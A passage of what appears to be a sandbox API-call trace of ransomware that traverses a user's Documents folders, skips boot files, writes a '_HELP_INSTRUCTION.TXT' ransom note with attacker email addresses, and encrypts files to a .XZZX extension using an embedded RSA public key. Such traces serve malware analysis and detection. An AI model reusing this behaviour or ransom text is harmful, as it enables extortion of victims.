lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0109.120] SetErrorMode (uMode=0x1) returned 0x1 [0109.120] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0109.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0109.120] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0109.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0109.120] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0109.120] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0109.120] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0109.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0109.120] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="Desktop") returned 0x0 [0109.120] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="DESKTOP") returned 0x0 [0109.120] SetErrorMode (uMode=0x1) returned 0x1 [0109.121] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 73 [0109.121] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0109.121] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0109.121] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x408) returned 0x0 [0109.121] RegQueryValueExW (in: hKey=0x408, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb5450, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cb5450*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0109.121] RegCloseKey (hKey=0x408) returned 0x0 [0109.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0109.121] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0109.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0109.122] CloseHandle (hObject=0x408) returned 1 [0109.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0109.123] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0109.123] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.123] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0109.123] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0109.123] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0109.123] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0109.123] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0109.123] SetErrorMode (uMode=0x1) returned 0x1 [0109.123] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0109.123] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0109.123] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0109.123] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0109.123] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0109.125] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="My Shapes" [0109.125] lstrcpyW (in: lpString1=0x17b644, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0109.125] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.125] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.125] lstrcmpW (lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpString2="..") returned 1 [0109.125] lstrcmpW (lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpString2=".") returned 1 [0109.125] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0109.125] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="ntldr") returned 0x0 [0109.125] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="NTLDR") returned 0x0 [0109.125] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0109.125] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="ntdetect.com") returned 0x0 [0109.126] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0109.126] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0109.126] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 54 [0109.126] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.126] lstrcpyW (in: lpString1=0x17be7c, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0109.126] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0109.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x40c [0109.126] Sleep (dwMilliseconds=0x96) [0109.268] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.268] lstrcmpW (lpString1="Favorites.vss", lpString2="..") returned 1 [0109.268] lstrcmpW (lpString1="Favorites.vss", lpString2=".") returned 1 [0109.268] StrStrW (lpFirst="Favorites.vss", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0109.268] StrStrW (lpFirst="Favorites.vss", lpSrch="ntldr") returned 0x0 [0109.268] StrStrW (lpFirst="Favorites.vss", lpSrch="NTLDR") returned 0x0 [0109.268] StrStrW (lpFirst="Favorites.vss", lpSrch="NTDETECT.COM") returned 0x0 [0109.268] StrStrW (lpFirst="Favorites.vss", lpSrch="ntdetect.com") returned 0x0 [0109.268] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0109.268] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0109.268] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 54 [0109.269] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.269] lstrcpyW (in: lpString1=0x17be7c, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0109.269] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0109.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x410 [0109.269] Sleep (dwMilliseconds=0x96) [0109.424] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.424] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0109.424] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0109.424] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0109.424] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.424] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0109.424] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0109.424] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0109.424] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0109.424] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0109.424] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0109.424] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0109.424] SetErrorMode (uMode=0x1) returned 0x1 [0109.425] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT") returned 71 [0109.425] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0109.425] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0109.425] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x418) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x418, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb5680, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cb5680*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0109.425] RegCloseKey (hKey=0x418) returned 0x0 [0109.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0109.425] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0109.425] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0109.426] CloseHandle (hObject=0x418) returned 1 [0109.426] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0109.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="My Shapes" [0109.426] lstrcpyW (in: lpString1=0x17b644, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0109.426] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0109.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0109.426] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0109.427] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.427] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.427] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.427] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.427] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0109.427] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0109.427] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0109.427] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0109.427] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0109.427] SetErrorMode (uMode=0x1) returned 0x1 [0109.427] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0109.427] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0109.427] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0109.427] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0109.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0109.429] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="_private" [0109.429] lstrcpyW (in: lpString1=0x17a5a4, lpString2="_private" | out: lpString1="_private") returned="_private" [0109.429] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.429] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.429] lstrcmpW (lpString1="7B7BA3C4205941180FE9457124712560.XZZX", lpString2="..") returned 1 [0109.429] lstrcmpW (lpString1="7B7BA3C4205941180FE9457124712560.XZZX", lpString2=".") returned 1 [0109.429] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0109.429] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="ntldr") returned 0x0 [0109.429] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="NTLDR") returned 0x0 [0109.429] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0109.429] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="ntdetect.com") returned 0x0 [0109.429] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="Desktop") returned 0x0 [0109.429] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="DESKTOP") returned 0x0 [0109.429] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 63 [0109.429] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.430] lstrcpyW (in: lpString1=0x17addc, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0109.430] lstrcpyW (in: lpString1=0x17a9dc, 